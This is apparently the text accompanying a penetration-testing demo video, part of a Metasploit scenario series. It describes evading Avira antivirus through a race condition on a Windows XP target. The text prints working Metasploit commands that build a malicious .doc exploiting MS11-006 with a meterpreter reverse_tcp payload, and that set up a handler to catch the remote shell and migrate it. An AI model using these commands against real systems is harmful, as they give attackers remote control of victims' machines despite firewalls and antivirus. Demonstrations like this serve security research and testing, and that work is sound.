Third scenario of the Metasploit Exploitation Scenarios.
Here, the user is a standard user, protected by 5 countermeasures :
– Firewall rules how limit the outbound connexions only on special ports.
– Transparent HTTP/S Proxy for web surfing.
– Dual antivirus (Avira / Clamav) scanning for web surfing (useless in the case, due to the Astaro bugs).
– Dr.Web Antivirus on the target Windows XP.
– Windows Firewall on the target Windows XP.
This video will demonstrate you a race condition against Avira anti-virus products. This race condition is due to design errors in the Avira anti-virus products themselves.
As you will see, the installed “Avira AntiVir Personal” anti-virus will detect the attack, but to late. The meterpreter sessions is created and you have access to the system.
The demonstrated product is an update-to-date “Avira AntiVir Personal”. But this race condition appear for others Avira products, such as “Avira AntiVir Premium” and “Avira Premium Security Suite“.
Metasploit commands :
To create the msf.doc file to exploit MS11-06 vulnerability
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
To listen for incoming meterpreter sessions
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set InitialAutoRunScript migrate -f
exploit -j